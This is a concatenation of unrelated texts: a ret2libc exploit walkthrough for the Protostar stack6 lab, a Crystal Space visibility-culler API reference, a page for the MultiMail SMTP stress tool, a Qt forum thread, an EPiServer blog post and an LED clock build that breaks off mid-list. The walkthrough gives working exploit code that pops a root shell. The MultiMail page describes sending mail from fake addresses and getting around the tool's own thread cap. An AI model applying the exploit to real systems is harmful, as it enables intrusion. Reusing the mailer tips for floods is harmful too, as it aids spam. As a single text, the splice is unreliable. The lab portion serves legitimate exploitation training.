Thankfully, our dear friend Protostar, the virtual machine, has an exploit development challenge that will help us learn how to get around this. Let's take a look at the stack6 level on Protostar and see what we can learn!
Step 1: Taking a Look at the Source Code
As always, the first thing we should do is take a look at the source code on Exploit Exercises to see what we're up against:
Let's break this code down line by line:
- In lines 8 and 9, we see two variables defined. The first one is an array of characters named "buffer" which is given a size of 64 bytes. This means it can hold at most 64 characters. This is good to know. Next, we see an integer named "ret" defined. We haven't seen a variable like this in previous exercises before, so it'll be interesting to see what this is used for.
- In line 11, the program prompts the user for input, and on line 13 this input is passed to the buffer variable. Notice how the program doesn't check to see if the user input will fit inside the 64 bytes given to buffer. That's pretty dumb but really good for us so we won't tell the programmer. Shh.
- Now, in line 15, the variable ret pops up again. This is actually an assignment statement. The __builtin_return_address(0) refers to EIP. It turns out this line is storing the value of EIP into the ret variable. Why on earth would the programmer be doing that? ...
- Well, in line 17, we find out, and as attackers, the answer isn't good. Line 17 holds what seems to be a cryptic "if" statement. This if statement is using what is called a bitwise operator to check if the address written to the instruction pointer starts with the byte "0xbf." If the address does start with this byte, the program stops the execution.
Well, that's not good. Maybe the programmer isn't so dumb after all. Essentially, this means that we can't overwrite EIP with any address that starts with "0xbf." This is a problem because, in this challenge, any shellcode we could write will always be located in a memory address that starts with "0xbf." How in the heck are we going to exploit this program then? We'll worry about what we're going to overwrite EIP with later. For now, let's just start with actually overwriting EIP with anything at all.
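To demystify the check a little, here's a rough Python illustration of the masking idea; the exact expression in the C source may differ, so treat this as an approximation rather than the program's actual code:

ret = 0xbffff7cc   # a typical stack address on Protostar

# Mask the return address against the top byte and compare. For a stack
# address like the one above, the comparison succeeds and the program bails.
if (ret & 0xbf000000) == 0xbf000000:
    print "return address starts with 0xbf -- program exits"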
Step 2: Building the Framework of Our Exploit
Let's SSH into the Protostar VM and get cracking. If you don't already have Protostar installed, check out our guide on how to install Protostar as a virtual machine.
Once Protostar is all set up, use your favorite SSH client to log in. The username to log in is user and the password is also user. Once we're logged in, let's spruce up our terminal prompt a little bit. By default, Protostar serves us a /bin/sh shell for us, but this can be sort of limiting. We want a fully featured, glorious /bin/bash prompt instead. To get one, type:
bash
Simple as that. Now let's open up a new file by typing the following command:
nano exploit.py
After that, we'll build the framework for our exploit by typing the code in the screenshot below.
- As always, the first line is optional. All it does is tell the OS that when this program is executed, it should be executed as a Python script. While this line enables us to execute the script directly, it is not needed to run the script via the python command.
- The next two lines import the struct and os packages for use in our program. We'll use struct later, but we'll need the os package right away.
- Next, we define our main function. Here we start by defining an integer called padding. This variable will determine how long we make our buffer overflow. As we can see on the next line, we store our payload variable first with the letter "A" multiplied by our padding variable. This means if padding is 4, we end up with 4 A's in our exploit.
- The next three lines are new to this series. Instead of using the echo command to pass our payload to a text file, we are going to use Python's file I/O to get the job done. The reason we're doing this is because certain memory addresses create problems when they are passed directly to the shell.
Once we open, write to, and close our payload.txt file, we are ready to pass the payload to the vulnerable program. This can be done right in the shell, so we use the os.system command to do this. We first use the cat command to read the contents of payload.txt to standard output, then we use the pipe ("|") command to redirect standard output to the standard input of the vulnerable stack6 program.
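For reference, here is a minimal sketch of the framework described above; names like payload.txt match the description, but your copy may differ in small details from the screenshot:

#!/usr/bin/env python
import struct  # not used yet; we'll need it later to pack memory addresses
import os

def main():
    padding = 4
    payload = "A" * padding

    # Write the payload to a file rather than echoing it through the
    # shell, since some raw memory addresses break shell quoting.
    f = open("payload.txt", "w")
    f.write(payload)
    f.close()

    # Feed the payload to the vulnerable program's standard input.
    os.system("cat payload.txt | /opt/protostar/bin/stack6")

main()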
Let's save this, run the program and see what happens:
Well, we didn't see any terribly exciting output, but this is a nice confirmation. The framework of our exploit works. Now it's time to jump back into the fray and indulge in the delicious world of the GNU debugger (GDB).
Step 3: Using GDB to Determine the Size of Our Exploit
The quickest way for us to determine how large our exploit needs to be is by looking at the memory of the program. Let's hop into GDB and take a peak. To do this, we type:
gdb /opt/protostar/bin/stack6
Doing so should result in output that looks similar to the screenshot below.
Once GDB has started up, we need to set a breakpoint. This breakpoint will stop execution at a certain point so that we can identify the values of variables and registers at that instant. Looking back at the source code, line 22 seems like a good candidate. This is because at this point the program has already received and processed the input from the user, but hasn't printed the user input yet. We don't really want to see the user input because once we start inserting memory addresses into our payload, the whole thing will look really messy. For the sake of organization, it makes sense to break before this happens.
To set a breakpoint at line 22, we type:
break 22
Pretty simple. Now it's time to run the program. In order to run the program and pass it our current payload from inside GDB, we'll have to type:
run < payload.txt
At this point, our screen should look something like this:
As you can see, we've hit our breakpoint and can begin looking at memory. Specifically, we are going to want to look at the current stack frame. This is where our payload will be, as well as the instruction pointer. In order to do this, we'll type:
x/32x $esp

This tells GDB to examine 32 words of memory in hexadecimal, starting at the stack pointer, i.e., the memory at the very beginning of the current stack frame.
Let's see what output we get from this command:
Well, would you look at that. ... We've found our A's! They were right where we left them in the stack frame. We can see here that our four A's start at the memory location 0xbffff77c and fill through 0xbffff77f. This is really useful. Now that we know where our payload starts, all we need to do is figure out where the instruction pointer is. Then we will be able to determine how long our payload should be.
This is very trivial for us. In order to locate the instruction pointer, all we have to do is type:
info frame
In addition to giving us information about the instruction pointer, we'll also see other information about the current stack frame with this command. For our purposes, however, this information is extraneous and not needed. Let's take a look at the output we get from this command:
Lo and behold, we have precisely just what we need. By running the info frame command, we can now see that the instruction pointer is located at the memory address 0xbffff7cc (highlighted in red) and contains the address 0x08048505 (highlighted in green). This isn't too far from the start of our payload. In fact, we can figure out just how far apart those two addresses are by typing the following command.
p 0xbffff7cc - 0xbffff77c
Typing this gives us a result of 80. This means we need a total of 80 A's as padding to overflow memory right up to EIP. While 80 A's won't actually overwrite EIP, it will be one byte away from doing so. Let's test that theory.
Step 4: Modifying Our Exploit
We can exit GDB by typing the command quit. Once we've done that, let's hop back into our exploit by typing nano exploit.py. Let's change the value of our padding variable from 4 to 80 and see what the memory looks like in GDB.
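The change itself is a single line in exploit.py:

padding = 80  # was 4; 80 bytes of A's fills memory right up to EIP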
Once the padding variable has been modified, save and close exploit.py. Let's run the exploit and see what happens:
Well, that is absolutely bizarre. Not only does the program output appear twice, but we have some weird stuff happening to our PuTTY prompt. If you are using a program other than PuTTY, your output might look different, but it's probably still very weird. Most notably, we seem to have caused a segmentation fault in the program. Usually, this indicates that we actually overwrote the instruction pointer. That wouldn't make sense, though, since we just did the math. Let's look at another GDB memory dump and see what we find:
Repeating the same steps as earlier, we're able to see a memory dump of the stack frame with our new payload. Sure enough, we have filled the memory with just enough A's to bring us next to EIP without messing with it. That segmentation fault we saw earlier must be caused by a different breakdown in the program's logic by our exploit. This shouldn't impact our exploit itself though.
Step 5: Understanding the ret2libc Technique
If you've been following this tutorial series, much of this is most likely review for you. You've interacted with GDB, looked over source code, and pushed more A's around than you'd care to admit. You're ready for the new stuff, and new stuff you shall get. Let's finally walk through what the ret2libc technique actually is.
Finding Something Useful in the Program
Essentially, the problem we're faced with is this: In order to get a shell in the past, we have written shellcode inside a variable and overwritten the instruction pointer with an address that would eventually point to this shellcode. In this challenge, we can't point EIP anywhere near where we can put shellcode. With this in mind, where on earth do we redirect EIP to? The answer is simple: We redirect EIP to system.
What Is System?
Believe it or not, you've already created a system call. If we look at our current exploit, at the very end we use a function called os.system which passes an argument as a system command. We can do the very same thing inside of our vulnerable program. If we were to give EIP the address of the system function, we could tell the system to execute /bin/sh and bless us with a shell.
How Can We Do This?
In order to successfully execute the system function, we have to follow a certain template in our exploit that looks something like this:
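Pieced together from the steps that follow, the layout on our 32-bit target looks like this (each of the last three fields is four bytes):

[ padding up to the saved EIP ][ address of system ][ 4 dummy bytes ][ address of "/bin/sh" ]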
The reason this order is required has to do with the function prologue of the system function. Essentially, this is the part of the function that sets up the stack frame the function will use. This includes making sure that arguments are passed to the function correctly.
When execution "returns" into system, the function treats the next four bytes on the stack as its own return address, and the four bytes after that as its first argument. How all of this works has a lot to do with the actual assembly instructions, which we won't get into. For now, just know that we need an extra four dummy bytes after the address of system in order for the function to correctly read the address of our string.
The Kicker
We can't actually just pass "/bin/sh" in our exploit. The system function takes a pointer to a string, not a string itself. This means that we store the string "/bin/sh" somewhere else in memory and pass the memory address to the system function. This can be a bit annoying, but we'll shove that into the corner and pretend it's not there — for now. Let's focus on the next step: Obtaining the address of system.
Step 6: Find the Address of System in Memory
Finding the address of system is actually a pretty straightforward process in GDB. Let's jump back into GDB and reset our breakpoint again. Once that's done, we'll type run to start the program. We don't need to pass our payload this time because we aren't concerned with looking at memory. Instead, feel free to just type whatever you want into the program's prompt, and hit enter. Doing so will trigger the breakpoint.
Once we've hit the breakpoint, we need to type the following command.
p system
This will print out information about the system function, including its address. In the above image, the address of system is highlighted in red. Write that address down somewhere — we're going to need it soon.
Step 7: Implementing a Call to System in Our Exploit
Let's exit out of GDB and open our exploit, which will now look something like this:
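(A sketch in Python 2, matching the era of these exercises; the address is an example from our GDB session and the binary path is a placeholder, so use your own values.)

import struct
import os

padding = 80
payload = "A" * padding

system_addr = struct.pack("<I", 0xb7ecffb0)  # address of system from GDB (example)

payload += system_addr
payload += "AAAA"  # the four dummy bytes from our diagram

f = open("payload.txt", "w")
f.write(payload)
f.close()

os.system("cat payload.txt | ./stack6")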
We've changed two things here: First, on line 7, we've created a new variable called system_addr. As you may have guessed, this will hold the address of system. Like we've done in the past, we'll use the handy-dandy struct.pack function to package the address of system in the correct format. We then append this address to the end of the payload string, followed by the four dummy bytes we saw in our diagram earlier.
If we saved and ran the exploit at this point, we wouldn't really see anything exciting. In fact, the exploit would behave exactly the same as it had before we made these new changes. The reason for this is because we haven't passed any real arguments to system yet. The Python equivalent of our current exploit would be this:
os.system("")
That sucks. That's boring. That's going to change. Our next mission is to find a string somewhere in the program that contains "/bin/sh." This will be a grind.
Step 8: Hunting for /bin/sh
At first glance, looking for the string "/bin/sh" inside a program seems to be a bit of a wild goose chase. Why would that string exist in the stack6 program? That's a great question, because the string won't actually come from the program at all. We'll find our target string in the environmental variables of our current shell session.
Don't believe me? Let's type the following command and see.
env
BOOM. There it is. This variable, along with every other environmental variable, is loaded into every program that is run from this shell. If we can find where in memory this string is, we can use it as the argument to our system call. Finding it won't be easy though.
We might as well get started, so let's open GDB back up and start searching. Once again, we'll set a breakpoint at line 22 and run the program. Passing payload.txt as input is not necessary this time.
Once we hit our breakpoint, we're going to type something a little different. Take a look at the following command:
x/s *(environ)
It looks intimidating, but we'll break it down.
The first part should look familiar. The x at the very beginning tells us that we are using the examine command that we know and love. Instead of passing /x, however, we pass /s as the first argument. This means that instead of examining the data in hexadecimal format, we want to examine the data as a string. We do this because it would be really hard to identify the string "SHELL=/bin/sh" in hexadecimal format.
The last portion of the command is the most arcane looking. Let's actually start by defining what the term environ means. Here, environ is a pointer to a pointer for the environmental variables of a program. As obnoxiously abstract as that sounds, essentially what that means is that environ contains a memory address which points to another memory address. In this second memory address, the starting address of the environmental variables is stored.
We don't want the pointer address, though, we want the address of the environmental variables. To get this, we have to dereference the pointer. When we dereference a pointer, we grab the value from the memory address that is stored in the pointer. This is a common idea in the C programming language, but it can be tricky to understand at first. Take a look at the diagram below for an explanation of what's going on.
Essentially, the environ variable contains a memory address. This is similar to the system_addr variable in our exploit. The value stored at that memory address is another memory address. This value is the address of the environmental variables. While this seems convoluted, it allows us to quickly iterate through the environmental variables in the program until we find the one we want, like so:
x/s *(environ+1)
This will show us the second environmental variable in memory, regardless of how long the first one is. This makes digging through the memory much easier. All we have to do is keep incrementing our addition to environ until we find the SHELL variable like so:
Bingo. The address of /bin/sh. Well, sort of. In the above screenshot, the address 0xbfffff88 points to the string "SHELL=/bin/sh." We only want "/bin/sh." This is a simple fix though. All we have to do is add 6 to the address when we pack it in our exploit. No problem. Let's add this address to our exploit and see what happens!
Step 9: Adding the Pointer to /bin/sh to Our Exploit
Now that we have this address, our exploit should look something like this:
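(Same caveats as before: a Python 2 sketch with example addresses and a placeholder binary path.)

import struct
import os

padding = 80
payload = "A" * padding

system_addr = struct.pack("<I", 0xb7ecffb0)     # address of system from GDB
shell_addr = struct.pack("<I", 0xbfffff88 + 6)  # address of "SHELL=/bin/sh" plus 6 to skip "SHELL="

payload += system_addr
payload += "AAAA"  # dummy return address for system()
payload += shell_addr

f = open("payload.txt", "w")
f.write(payload)
f.close()

os.system("cat payload.txt | ./stack6")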
As you can see we've added a variable called shell_addr. We slap this on the back of our payload string to finish implementing the exploit template we looked at earlier. Let's save our exploit and see what happens!
Step 10: Testing Our Exploit
After all of our hard work, it appears we're done. It's time to bask in our glorious new exploit and pop a root shell on stack6. Let's see it!
What? What happened? We did everything right. We found the address of system, the address of /bin/sh, and put them all together correctly. Why did this exploit not work?
Well, there are a couple of reasons. Let's start with the first one: We didn't actually find the correct address of /bin/sh. We found the address while the program was running inside GDB, and the debugger's own environment shifts the stack slightly, so the address of /bin/sh changes outside the debugger. So how do we find the real address of /bin/sh?
Step 11: Returning to the Hunt
The first thing we could try to do is guess the address of /bin/sh, but that might take a while. While the address we have from GDB is somewhat close, it would still take a lot of guessing to find what we want.
Determining exactly where the string /bin/sh might be in memory is possible, but complicated. We could write another tutorial for just that. However, we can still get closer than we actually are. If we can print the address of SHELL from a similar executable we create ourselves, we could get closer to finding the real slim SHELL. Let's open up a new file in nano by typing:
nano find_env.c
In case you're wondering, yes, we will be writing a simple C program. It's the only way to do this. I promise it won't be that bad though. Let's take a look:
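(A sketch: getenv is an assumption about the exact call used, but it matches the two lines described next.)

#include <stdio.h>
#include <stdlib.h>

int main()
{
    char *addr = getenv("SHELL");             /* pointer to the SHELL variable's value */
    printf("SHELL is located at %p\n", addr); /* print the address itself */
    return 0;
}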
See? It's not so bad! Just a couple lines. The first line defines a pointer which stores the address of the SHELL variable. The second line prints it. Simple. To compile this program, type:
gcc find_env.c
Once the program is compiled, it will be saved as an executable called a.out. To run a.out, type:
./a.out
You should see the following:
Alright, now we're getting closer. Our program is telling us that in the a.out program, SHELL is located at 0xbffff9de. We can be pretty confident this is an underestimate because our program is far simpler than stack6.c. The address will still be close though.
Let's make some edits to our exploit:
We make two changes here: First, we modify the address of shell to our closer estimate. The second change, however, comes in the system call on the last line of main. As you can see, cat payload.txt has become (cat payload.txt; cat).
As some of you might recall from our last stack overflow tutorial, running /bin/sh from an exploit can be tricky. This is because the shell's standard input can close as soon as the piped payload runs out, killing the shell the moment it opens. To make sure we're not missing the correct address, we've kept standard input and output open with a call to the cat command.
Alright! From here, it really is just Guess City. Luckily for you, I've already done the guessing for you. Our estimate was still 1,465 bytes shy of the actual address of SHELL. That means the final exploit will look something like this:
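(A sketch in Python 2: the base address comes from our helper program plus the guessed 1,465-byte offset; your numbers and binary path will differ.)

import struct
import os

padding = 80
payload = "A" * padding

system_addr = struct.pack("<I", 0xb7ecffb0)        # address of system from GDB (example)
shell_addr = struct.pack("<I", 0xbffff9de + 1465)  # a.out estimate plus the guessed offset
                                                   # (add 6 more if your address points at "SHELL=")

payload += system_addr
payload += "AAAA"  # dummy return address for system()
payload += shell_addr

f = open("payload.txt", "w")
f.write(payload)
f.close()

# (cat payload.txt; cat) keeps stdin open so the shell doesn't die instantly.
os.system("(cat payload.txt; cat) | ./stack6")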
Run that bad boy, and you should end up with a shell like this:
Final Thoughts
While this exploit is good, it isn't perfect. As you play around with your nice new shell, you'll notice that when you type the exit command, you end up with a segmentation fault. That isn't very clean. The reason is this: After the system call we pass finishes execution, the instruction pointer goes to the next address. Remember what we set that to? That's right, AAAA. That will always cause a crash. It sure would be nice if there was a way to exit a little more nicely, but I'll leave that as an exercise for you to do on your own.
Thank you for reading! Congratulations on making it through the slow grind. Comment below with any questions or contact me via Twitter @xAllegiance if you need help.
iVisibilityCuller Struct Reference
[Visibility]
This interface represents a visibility culling system. More...
#include <iengine/viscull.h>
Detailed Description
This interface represents a visibility culling system.
To use it you first register visibility objects (which are all the objects for which you want to test visibility) to this culler. A visibility culler can usually also support shadow calculation.
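In code, the basic flow looks something like this (a sketch: the method names Setup, RegisterVisObject, VisTest and UnregisterVisObject are inferred from the member descriptions below and should be checked against the header):

// One-time setup; the name is used to cache the culler's data.
culler->Setup ("mysector");

// Register every object whose visibility should be tested.
culler->RegisterVisObject (visobj);

// Each frame: clear the visible flags and mark the visible objects.
culler->VisTest (renderView);

// When an object goes away:
culler->UnregisterVisObject (visobj);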
Main creators of instances implementing this interface:
- Dynavis culler plugin (crystalspace.culling.dynavis)
- Frustvis culler plugin (crystalspace.culling.frustvis)
Main ways to get pointers to this interface:
Main users of this interface:
Definition at line 101 of file viscull.h.
Member Function Documentation
Start casting shadows from a given point in space.
What this will do is traverse all objects registered to the visibility culler. If some object implements iShadowCaster then this function will use the shadows casted by that object and put them in the frustum view. This function will then also call the object function which is assigned to iFrustumView. That object function will (for example) call iShadowReceiver->CastShadows() to cast the collected shadows on the shadow receiver.
Intersect a segment with all objects in the visibility culler and return them all in an iterator.
If accurate is true then a more accurate (and slower) method is used.
Intersect a beam using this culler and return the intersection point, the mesh and optional polygon index.
If the returned mesh is 0 then this means that the object belonging to the culler itself was hit. Some meshes don't support returning polygon indices in which case that field will always be -1. If accurate is false then a less accurate (and faster) method is used. In that case the polygon index will never be filled.
Intersect a segment with all objects in the visibility culler and return them all in an iterator.
This function is less accurate then IntersectSegment() because it might also return objects that are not even hit by the beam but just close to it.
Parse a document node with additional parameters for this culler.
Returns error message on error or 0 otherwise.
Precache visibility culling.
This can be useful in case you want to ensure that render speed doesn't get any hickups as soon as a portal to this sector becomes visible. iEngine->PrecacheDraw() will call this function.
Register a visibility object with this culler.
If this visibility object also supports iShadowCaster and this visibility culler supports shadow casting then it will automatically get registered as a shadow caster as well. Same for iShadowReceiver.
Setup all data for this visibility culler.
This needs to be called before the culler is used for the first time. The given name will be used to cache the data.
Unregister a visibility object with this culler.
Mark all objects as visible that intersect with the given bounding sphere.
Notify the visibility callback of all objects that are in the volume formed by the set of planes.
Can be used for frustum intersection, box intersection, ....
- Remarks:
- Warning! This function can only use up to 32 planes.
Do the visibility test from a given viewpoint.
This will first clear the visible flag on all registered objects and then it will mark all visible objects. If this function returns false then all objects are visible.
Notify the visibility callback of all objects that intersect with the given bounding sphere.
Mark all objects as visible that are in the volume formed by the set of planes.
Can be used for frustum intersection, box intersection, .... Warning! This function can only use up to 32 planes.
Mark all objects as visible that intersect with the given bounding box.
The documentation for this struct was generated from the file iengine/viscull.h.
MultiMail 2.0 is a multi-threaded SMTP stress testing program which also doubles up as a handy
tool for anti-Spam software development. It starts multiple threads, each sending
a large number of mails in parallel to a specified SMTP server. MultiMail 2.0 is
freeware and can be used by anyone without the author's explicit permission.
I wrote the first version while I was developing my own anti-Spam program Pop 3 Protector
(discontinued). I used it to bombard test POP accounts with a large amount of
email from multiple fake email addresses and with multiple subject headers.
A few months ago (as of this writing in February 2002), I was asked to try out three different Linux-based SMTP
servers and decide on the fastest one. That's when I got a chance to use this
tool once again. I sent huge amounts of mail through each server and recorded
connection and mail delivery speeds. To increase the load I made the program
multi-threaded. The user can set the number of threads to use. In this
particular version I have restricted this number to 10, to prevent malicious
people from misusing this program. But for anyone who wants to
use this as an SMTP stress tester, 10 threads running in parallel, each thread
sending 1000 mails each, should be quite good enough.
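The thread fan-out itself isn't shown in the excerpt further down; a minimal sketch of it, using plain Win32 threads (an assumption about the original implementation), would be:

#include <windows.h>

DWORD WINAPI MailThread(LPVOID param)
{
    int mailsToSend = (int)(INT_PTR)param;
    for (int i = 0; i < mailsToSend; i++)
    {
        // Build and send one message here (see the ATL snippet below).
    }
    return 0;
}

int main()
{
    const int THREAD_COUNT = 10;  // capped at 10 in this build
    HANDLE threads[THREAD_COUNT];
    for (int t = 0; t < THREAD_COUNT; t++)
        threads[t] = CreateThread(NULL, 0, MailThread, (LPVOID)(INT_PTR)1000, 0, NULL);
    WaitForMultipleObjects(THREAD_COUNT, threads, TRUE, INFINITE);
    return 0;
}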
Actually there is a sneaky way to override the restriction, which is by running multiple instances of the program. But for some strange reason I have noticed that this will considerably slow down the user's machine, and I hope that will deter people from trying it out.
Version 2.0 uses the ATL7 SMTP and MIME classes and so I have removed all my
Winsock-SMTP-chat code from the program. This has enabled me to add support for
attachments which is quite handy.
#include <atlsmtpconnection.h>

CoInitialize(0);

CMimeMessage msg;
msg.SetSender(strSender);
msg.AddRecipient(strRecepient);
// Optional
msg.SetSubject(strSubject);
msg.AddText(strBody);
msg.AttachFile(strAttachFile);

CSMTPConnection conn;
conn.Connect(server);
BOOL bSuccess = conn.SendMessage(msg);
conn.Disconnect();

CoUninitialize();
Add QML objects to your C++ widget application.
My company's High Command has ordered me to develop a tumbler.
This tumbler or rrrrrrrr-thing as we call it is a QML type object. And I have no experience with QML. I have already googled some stuff but I can't find how to add a QML object to the rest of my application.
I do know:
- I have to use a QGraphicView widget. I already have one of those in use with some extra space left. (I'm using Qt 5.8)
- I must include: #include <QtQuick/QQuickView> and #include <QtQml/QQmlEngine> in the header file
- I must make a new QML file.
What I don't know:
- how can I make a QML object in my cpp file and give it a place on my QGraphicView?
Hm so far for the need of a QGraphicView :)
I have done:
- added to header.
#include <QtQuickWidgets/QQuickWidget>
- added to header
QQuickWidget *view;
- added to setup of CPP file
view = new QQuickWidget;
view->setSource(QUrl::fromLocalFile("Tumbler.qml"));
view->show();
But I'm having error messages
mainwindow.cpp:-1: error: undefined reference to `QQuickWidget::QQuickWidget(QWidget*)'
mainwindow.cpp:-1: error: undefined reference to `QQuickWidget::setSource(QUrl const&)'
mainwindow.cpp:-1: error: undefined reference to `QQuickWidget::QQuickWidget(QWidget*)'
mainwindow.cpp:-1: error: undefined reference to `QQuickWidget::setResizeMode(QQuickWidget::ResizeMode)'
:-1: error: collect2: error: ld returned 1 exit status
Did I include the wrong library or something????
BTW: I also added a QQuickWidget to the ui which is named 'view'
- jsulm Moderators
@bask185 said in Add QML objects to your C++ widget application.:
QQuickWidget
Did you add
QT += quickwidgets
to your pro file as is stated here ?
Ok that solved the error problems. I don't think I will forget this a 3rd time @jsulm ;)
I also ditched the code I had and I moved the QML file to the resource folder. Using Qt creator's convenient style sheet bar thing (that bar in the UI on the right with all the parameters) I selected the QML file and I got me a working Tumbler \o/
The part of the application this tumbler is eventually going to live in is still a long way off, but... minor detail
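For anyone who lands on this thread later, the whole fix boils down to something like this (a sketch; it assumes the QML file is in the resource system as :/Tumbler.qml):

In the .pro file:

QT += quickwidgets

In the window setup code:

#include <QQuickWidget>
#include <QUrl>

view = new QQuickWidget(this);
view->setSource(QUrl("qrc:/Tumbler.qml"));
view->setResizeMode(QQuickWidget::SizeRootObjectToView);
view->show();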
In EPiServer CMS 6 R2 there is a new possibility to easily create Dynamic Content plugins from (User)Controls just by decorating them with an attribute. The idea has been implemented outside EPiServer for previous versions, for example here. The new “official” approach is described in this tech note.
Dynamic content plugins are required to persist their state (if any, you could implement stateless dynamic content which for example fetches information from a fixed resource) as a string. In the “classic” pattern you implement the state serialization yourself.
In the Control-based pattern the Framework does this for you. All you need to do is to give your Control public properties of any type that inherit PropertyData and they will be persisted (currently there’s a bug with PropertyXhtmlString though). There are also some shortcuts for strings, integers etc., read more in the tech note.
The design of this state storage isn’t optimal for all situations though…
The state storage of Control-based properties is handled by the EPiServer.DynamicContent.DynamicContentAdapter<T> generic class, inheriting from DynamicContentBase in the same namespace. The latter contains the code persisting the state and what it does is to loop over the properties and store a base64-encoded string for each, separating the substrings with pipes (‘|’).
Upon deserialization the properties are again looped over and the state string is split and decoded. But if you have added properties to your class "above" any of the existing properties, the state will be restored to the wrong property! This is because the properties are not distinguished by anything other than their order.
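To make the failure mode concrete, here is a toy model of that positional state storage (simplified; this is not the actual EPiServer source):

using System;
using System.Text;

class StateOrderDemo
{
    // Values are base64-encoded and pipe-joined; position is the only identity.
    static string Save(string[] values)
    {
        string[] encoded = new string[values.Length];
        for (int i = 0; i < values.Length; i++)
            encoded[i] = Convert.ToBase64String(Encoding.UTF8.GetBytes(values[i]));
        return string.Join("|", encoded);
    }

    static string[] Load(string state)
    {
        string[] parts = state.Split('|');
        string[] values = new string[parts.Length];
        for (int i = 0; i < parts.Length; i++)
            values[i] = Encoding.UTF8.GetString(Convert.FromBase64String(parts[i]));
        return values;
    }

    static void Main()
    {
        // Saved when the plugin's properties were [Text, Url]:
        string state = Save(new[] { "Hello", "http://example.com" });

        // Later the plugin adds a Heading property above Text, so the class
        // exposes [Heading, Text, Url] -- but restore is purely positional:
        string[] restored = Load(state);
        Console.WriteLine("Heading = " + restored[0]); // gets "Hello"
        Console.WriteLine("Text    = " + restored[1]); // gets the URL
    }
}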
So if you would decide to update your dynamic content by adding, say, a Heading property and place that at the top of the file (because you want it at the top of the Dynamic content editor) all your existing inserted dynamic content would be reduced to a smoking pile of junk, more or less.
Don’t add properties to dynamic content plugins based on DynamicContentBase that is already in use. Or if you have to, add them last in the class. Or override the State property (not possible for Control-based DC). Or start out with your own implementation and state storage that you can do your best to future-proof and make backwards-compatible updates in.
I've reported this as a bug. Sorry for any inconvenience.
More a weakness than a bug perhaps, no worries :) But make sure any new implementation is backwards compatible.
Introduction
It features 96 LED's that light up 52 'digit' regions. Unlike the original, it features a circular design that includes a seconds ring, instead of a horizontal bar layout. The outer band indicates seconds in conjunction with the middle dot, the next two bands indicate minutes, with the final inner bands indicating hours.
If you have some scrap material and extra time on your hands, why not use this time to make something that will show it!
There are a few changes I would make to this project if I were to make it again. First, I would paint the frame and LED board white instead of black. This would reflect more light through the large lens in the front. I would also wait until the end to insert the LED's. I needed the board to be finished earlier so it could help me with writing the code. With that out of the way, let's first learn how to read it!
Step 1: How to Read the Clock
The clock is read from the inner circles to the outer. The inner ring of four fields denote five full hours each, alongside the second ring, also of four fields, which denote one full hour each, displaying the hour value in 24-hour format. The third ring consists of eleven fields, which denote five full minutes each, the next ring has another four fields, which mark one full minute each. Finally the outer ring of 29 fields denote even seconds with the light in the center blinking to denote odd (when lit) or even-numbered (when unlit) seconds.
For example, the above image has 1 of the five hour digits, 3 of the one hour digits, 8 of the five minute digits, 4 of the one minute digits, and 23 of the two second digits and the middle second digit lit up.
1x5 + 3x1 : 8x5 + 4x1 : 23x2 + 1x1 = 8:44:47 = 8:44:47 AM
The time shown above is: 3x5 + 0x1 : 3x5 + 2x1 : 5x2 + 1x1 = 15:17:11 = 3:17:11 PM
The time shown above is: 3x5 + 2x1 : 3x5 + 3x1 : 16x2 + 1x1 = 17:18:33 = 5:18:33 PM
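In code form, reading the clock is just a pair of multiply-adds (a sketch; the field counts are whatever you count on each ring):

// centerDot is 1 when the middle light is lit, 0 otherwise.
int hours   = 5 * fiveHourFields   + oneHourFields;    // 24-hour time
int minutes = 5 * fiveMinuteFields + oneMinuteFields;
int seconds = 2 * twoSecondFields  + centerDot;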
Step 2: Tools and Materials
Electronics Materials:
- Arduino Nano
- Real Time Clock
- Addressable LEDs
- Power Plug
- Power Cable
- USB Power Plug
- Light Dependent Resistor and balanced resistor (if you want it to dim at night)
- Wire
Woodworking Materials:
- 3/4 in. Plywood
- Thin Plywood
- Scrap Wood (I used 2x4s but hardwood would work as well)
- Paint
- Acrylic 30 x 36 in. Sheet (found at local home improvement store)
- Window Tint (try to source locally. If none is available, you can find a sheet large enough here)
- Window Tint Application Fluid (I used water mixed with baby shampoo in a spray bottle)
- Windex
- Butcher Paper
- Screws
- Spray Adhesive
- Glue
- Glue Stick
Tools:
- Ruler
- Xacto Knife
- Tape
- Double Sided Tape
- Compass
- Circle Cutting Jig
- Jigsaw
- Bandsaw
- Spindle Sander
- Palm Sander
- Disc Sander
- Router Table
- Awl
- Drill and Drill Bits/Drivers
- Clamps
- Soldering Iron
- Solder
- Wire Strippers
Step 3: Assemble Templates
For the large template, print it off using the poster setting in Adobe Reader. Trim off the margins for each paper and tape together. The vertical, horizontal, and diagonal lines will help in lining up the template. The pages all have small numbers on them to help keep them organized if they fall out of order.
All templates and files needed are found in Step 26.
Step 4: Rough Cut Circles
Laying out the two templates on a sheet of 3/4 in. plywood, draw circles a bit larger than needed with a compass. Using a jigsaw, cut out the rough shape.
Step 5: Cut to Size
Using a circle cutting jig on the bandsaw, cut the circles to final size.
Step 6: Apply Template
Using spray adhesive, apply each template to a circle. Insert a nail in the center of the template to center it on the circle.
Step 7: Cut Template
Using a jigsaw, cut out each individual window of the template. If you have access to a CNC, this step would be much easier! I drilled a hole in each window to help with this process. As you start cutting, the template may start to come off. If this happens, you can secure it in place with small pieces of tape.
Step 8: Sanding
Using sandpaper applied to a stick, a spindle sander, and palm sander, sand and smooth out the rough cut left by the jigsaw.
Step 9: Drill Holes for LEDs
Mark the center of each hole with an awl and drill clearance holes for the LEDs (a 15/32 in. bit worked for mine). I used a guide to help keep the drill perpendicular to my workpiece and a backerboard to keep from blowing out the wood on the back.
Step 10: Combine Boards
Swap the front and back boards and trace parts of the frame on the back of the LED board. Move the frame back to the front of the LED board and drill holes and screw the pieces together.
See image notes for more information.
Step 11: Insert LEDs
Push the LEDs through the back of the LED board. The holes should be spaced just enough that you won't need to cut any wires except moving from one circle to the next.
From the back, the LEDs start in the center and then run counter clockwise then up to the next ring.
Step 12: Attach Segment 1
Cut out 9 segments from the "Segment 1" template attached on 3/4 in. plywood (found in step 26). Attach to the LED board with glue and clamps. If you are impatient you can also use nails to clamp it in place.
Once dry, sand the edge flush with a disc sander.
Step 13: Paint
Spray paint both the LED board and the frame. If I was making this again, I would have selected to use white paint instead of black as it would be more reflective through the lens.
Step 14: Segment 2
Cut out 9 segments from the "Segment 2" template attached out of wood that is 2 3/8 in. thick (found in step 26). I used some scrap 2x4s from around the shop. Dry fit the segments and ensure it fits well with a band clamp. If everything checks out, cover the outside with painters tape to keep the glue from sticking and let dry for at least an hour before moving on to the next step.
Step 15: Segment 3
